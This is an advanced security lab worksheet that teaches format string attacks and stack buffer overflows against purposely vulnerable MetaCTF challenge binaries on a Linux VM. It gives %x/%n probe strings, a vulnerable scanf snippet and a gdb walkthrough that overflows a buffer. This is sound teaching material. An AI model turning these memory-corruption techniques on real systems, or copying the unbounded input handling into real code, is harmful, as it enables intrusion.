Linux Buffer Overflows and Advanced Format String Attacks

Learn advanced software security exploitation techniques including format string attacks and buffer overflow vulnerabilities on Linux systems.

Lab Overview

In this lab, you will face some additional challenges designed to help you develop your understanding of software security and vulnerabilities. You will learn how to perform Format String Attacks, a type of vulnerability that allows attackers to manipulate the memory of a program by exploiting how it handles format specifiers. Additionally, you will further explore Buffer Overflows, a common security issue that arises when programs do not properly manage memory, leading to the overwriting of critical data.

Authors: Thomas Shaw

License: CC BY-SA 4.0

Difficulty: advanced

CyBOK Knowledge Areas: SS: Categories of Vulnerabilities memory management vulnerabilities Stack smashing buffer overflows Format string attacks MAT: Attacks and exploitation EXPLOITATION EXPLOITATION FRAMEWORKS Exploit development Metasploit Framework development

Tags: buffer-overflow format-string exploitation linux assembly gdb

Lab overview

This week’s topic involves a practical exploration of exploits on Linux based systems. The practical challenges involve exploiting buffer overflow vulnerabilities and a format string vulnerability. Three flags are available from MetaCTF challenges, two for challenges involving buffer overflows and one which requires you to perform a more advanced format string attack.

Format String Attacks

==VM: On your Desktop Debian Linux VM==

==action: Browse the challenges directory==

ls ~/challenges

When you run each program it will give you instructions and hints on how to solve the challenge.

==action: Run each of the challenges (always after changing to the directory first)==:

Following on from prior labs, this week includes another format string challenge. Similar to the previous challenges, this executable was compiled with stack protections and ASLR disabled.

Direct Memory Access

The $ symbol allows us to directly access a variable on the stack.

==action: Experiment with the input in order to see which element on the stack we control==. We can do this with our direct memory lookup ($) rather than manually calculating the offset.

==hint: e.g. “AAAA%4$08x”==

cd Ch3_Format5_nTargetWrite/

./Ch3_Format5_nTargetWrite

Previously, we placed the address to write to onto the stack so that it
was easy to discover and target with %n.  Unfortunately, this will not
always be present.  However, because the input string being used in the
printf call is usually stored on the stack, it is possible to inject the
address we want to write into as part of our input and then use a targeted
%n to write into the injected address. To do so, you will first locate
where the input string characters are located on the stack relative to
the vulnerable printf call by injecting a well-known string and then using
a series of %x format specifiers to determine its offset on the stack from
the printf call.  To do so, use an input string similar to:
   "ABCD-%x-%x-%x-%x-%x...."
Look at the resultant output to see where the hexadecimal representation
of ABCD appears (e.g. 44434241 for little-endian machines).  Once we find
our input on the stack, note its parameter number since this is the
number we will then target with a subsequent %n.  After noting this number
we can then replace the "ABCD" part of the input with an actual address.
At this point, we need to find what address to write to and the value
we need to write.  For this level, you are asked to overwrite a variable
called key with a specific number.  To determine the address of key and
the value to write into it, examine the disassembly of the program.
Locate the comparison that determines whether or not the level has been
completed.  The value of key is moved from a specific memory location
to a register before being checked against a specific value.  Note that
we have made the address of this memory location representable as an ASCII
string to make things easier for you to input as a string.  By using this
in place of ABCD, you will then be able to follow it with an appropriately
calculated %<num1>x%<num2>$n to solve the level.

The key should equal to 265.
Enter the password:

Click here for some additional notes and tips for this challenge.

Buffer Overflows on Linux Systems

Some programming languages require the programmer to manually manage memory. This involves defining how much memory is allocated for a variable to store data in. Programmers can make incorrect assumptions whilst reserving memory for variable-length pieces of data.

If a user can supply data which is insecurely copied to a memory location which is not large enough to contain it, adjacent memory can be overwritten.

If the memory location being written to is stored on the stack (i.e. as a local function variable or a function parameter), adjacent memory may contain critical data that is used in the control flow of the program. A prime example of this is the return address, which is pushed onto the stack when a function is called so that the program knows where to return to. If we can overwrite this address, we can make the program return to another location.

Buffer overflow CTF challenges

cd Ch3_07_StackSmash/

./Ch3_07_StackSmash

One way attackers used to leverage buffer overflow bugs to gain control of
a running program is to overwrite the return address of the function being
executed on the stack.  When the function returns, it returns to an address
the attacker chooses.  In this level, you are to overflow the buffer being
used to read in the password in a way that overwrites the return address of
the function it is in (unsafe_input).  A quick strategy to determine the
size of the unsafe buffer is to "fuzz" the program with a large sequence
of characters such as (AABBCCDDEEFFGG...) and see which ones appear during
critical execution points such as the return from unsafe_input. To simplify
the task of corrupting the return address, the location of the call you want
to return to that unlocks the program is in the ASCII range.  Be mindful of
endianness and ensure that you only overwrite the low 32-bits to point to
the function you want to return to.

Enter the password:

cd Ch3_07_ScanfOverflow//

./Ch3_07_ScanfOverflow

When receiving input from a user, it is important to limit the number
of characters accepted so that the input buffer does not overflow.
This level has the following code that is vulnerable to a buffer overflow.
    char buff[N];
    char guess[N];
    strncpy(guess,"REPLACE",8));
    .....
    scanf("%s",buff);
    if(strcmp(guess,password)==0)
In the code, the password variable stores the password and the guess
variable is filled in with the string REPLACE.  The strcmp is thus setup
to always fail.  However, the user's input buffer (buff) is vulnerable to
overflow since the scanf does not have a length delimiter associated
with it.  In this case, characters beyond buff will end up in guess.
Using the debugger, find what the password is, then determine the number
of bytes needed to overflow the buffer.  Finally, generate an input that
will overflow buff to place the password in guess.

Enter the password:

Tip: This challenge has a vulnerable scanf() call, within the user_input(param) function. The function call is vulnerable as there is no bounds checking and the user controls the input string. We are reading from stdin and storing the value in buff[n]. We can pass more than n characters into buff[], leading to a buffer overflow vulnerability. This allows us to overwrite contiguous memory. First off you should run the program within gdb, e.g. gdb -q ./Ch3_07_ScanfOverflow (the -q flag is ‘quiet mode’ which doesn’t print the long copyright intro text) If we disassemble main we can see that there is a call to user_input at main <+160>:

serpent@p-26-220-10-vIM8-5-linux-bof-format-metactf-desktop:~\~/challenges/Ch3_07_ScanfOverflow$ gdb -q ./Ch3_07_ScanfOverflow 

Reading symbols from ./Ch3_07_ScanfOverflow...(no debugging symbols found)...done.

(gdb) disassemble main

Dump of assembler code for function main:
   ...
   0x000000000040138b <+153>:   lea    rax,[rbp-0x10]
   0x000000000040138f <+157>:   mov    rdi,rax
   0x0000000000401392 <+160>:   call   0x4011b2 <user_input>
   ...
End of assembler dump.

The main function contains some print statements and this user_input call, which has 1 parameter. This parameter is stored in $rdi before the function is called (per the x86_64 linux calling conventions).

(gdb) x/s $rdi

0x7fffffffdfd0: "M2Y4MDg4\b"

Note: Interesting looking string, probably our password…

==action: We should then disassemble user_input to see what’s happening inside the function==.

(gdb) disassemble user_input

Dump of assembler code for function user_input:
   ...
   0x00000000004011fb <+73>:    lea    rax,[rbp-0x10]
   0x00000000004011ff <+77>:    mov    rsi,rdx
   0x0000000000401202 <+80>:    mov    rdi,rax
   0x0000000000401205 <+83>:    call   0x4010a0 <strcmp@plt>   
   0x000000000040120a <+88>:    test   eax,eax
   0x000000000040120c <+90>:    jne    0x401224 <user_input+114>
   0x000000000040120e <+92>:    mov    edi,0x40201c
   0x0000000000401213 <+97>:    call   0x401040 <puts@plt>
   0x0000000000401218 <+102>:   mov    eax,0x0
   0x000000000040121d <+107>:   call   0x401231 <printflag>
   0x0000000000401222 <+112>:   jmp    0x40122e <user_input+124>
   0x0000000000401224 <+114>:   mov    edi,0x402026
   0x0000000000401229 <+119>:   call   0x401040 <puts@plt>
   ...
End of assembler dump.

Next we should figure out what’s happening here. We want to work backwards from our printflag call + try figure out what we need to provide to get there. <+83> is a call to strcmp, comparing the contents of $rsi and $rdi <+90> is a jump-not-equal instruction, which jumps to <+114> if the strings do not match <+107> is our call to printflag (win function), which runs if the strings match <+114> loads some data into $edi, which is used as a parameter for… <+119> printing the ‘Try again’ message. So… we need to find out how $rsi and $rdi are populated prior to this strcmp call at user_input <+83>.

==action: Let’s set a breakpoint at the strcmp call at 0x0000000000401205, then inspect the registers without any input that would overflow the buffer==:

(gdb) break *0x0000000000401205

Breakpoint 2 at 0x401205

(gdb) c

Continuing.

Enter the password: asdf

Breakpoint 2, 0x0000000000401205 in user_input ()

(gdb) x/s $rsi

0x7fffffffdfd0: "M2Y4MDg4\b"

(gdb) x/s $rdi

0x7fffffffdfa0: "REPLACE"

Note: OK so we can see that the 2 parameters to strcmp contain the password, with a \b character (which is odd…) and the string REPLACE

Now we’ve got our breakpoint set up, we can pass in a long pattern string to see which of these registers we’re influencing (and here’s the misleading part…)

(gdb) r <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /home/serpent/challenges/Ch3_07_ScanfOverflow/Ch3_07_ScanfOverflow <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")

...

Breakpoint 1, 0x0000000000401392 in main ()

(gdb) c

Continuing.

Breakpoint 2, 0x0000000000401205 in user_input () (gdb) x/s $rsi 0x7fffffffdfd0: "JJJJKKKKLLLLMMMMNNNNOOOO" (gdb) x/s $rdi 0x7fffffffdfa0: "REPLACE"

Note: The $rdi and $rsi registers above contain the parameters that get passed to the strcmp function (i.e. the two strings that are being compared). Note that our input ends up in rsi whereas the string replace ends up in rdi rather than the password.

Conclusion

At this point you have:

Written a format string attack to overwrite a variable with a memory address
Exploited some buffer overflows on Linux

Well done!